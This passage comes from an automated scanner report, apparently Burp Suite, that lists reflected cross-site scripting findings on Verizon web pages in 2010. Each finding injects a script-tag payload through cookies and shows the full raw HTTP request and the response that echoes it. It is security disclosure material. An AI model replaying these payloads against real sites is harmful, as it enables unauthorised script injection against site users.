UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX2d1ec'><script>alert(1)</script>5088e34c333; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74917
Expires: Sat, 20 Nov 2010 03:15:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX2d1ec'><script>alert(1)</script>5088e34c333; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2D1EC'><SCRIPT>ALERT(1)</SCRIPT>5088E34C333 ' />
...[SNIP]...

2.919. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [vzpers cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 4def1<script>alert(1)</script>32724b85684 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX4def1<script>alert(1)</script>32724b85684; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 184934
Expires: Sun, 21 Nov 2010 18:31:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 18:31:48 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4DEF1<SCRIPT>ALERT(1)</SCRIPT>32724B85684 </DIV>
...[SNIP]...

2.920. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [vzpers cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26ceb'><script>alert(1)</script>e7ce56a9e71 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX26ceb'><script>alert(1)</script>e7ce56a9e71; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 184950
Expires: Sun, 21 Nov 2010 18:31:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 18:31:10 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX26CEB'><SCRIPT>ALERT(1)</SCRIPT>E7CE56A9E71 ' />
...[SNIP]...

2.921. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16bd1'><script>alert(1)</script>1c358468da2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX16bd1'><script>alert(1)</script>1c358468da2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74937
Expires: Sat, 20 Nov 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX16bd1'><script>alert(1)</script>1c358468da2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX16BD1'><SCRIPT>ALERT(1)</SCRIPT>1C358468DA2 ' />
...[SNIP]...

2.922. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af68f'><script>alert(1)</script>63ed67becf9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf68f'><script>alert(1)</script>63ed67becf9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74936
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXaf68f'><script>alert(1)</script>63ed67becf9; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF68F'><SCRIPT>ALERT(1)</SCRIPT>63ED67BECF9 ' />
...[SNIP]...

2.923. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e2e1'><script>alert(1)</script>1e4a8a0e625 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; 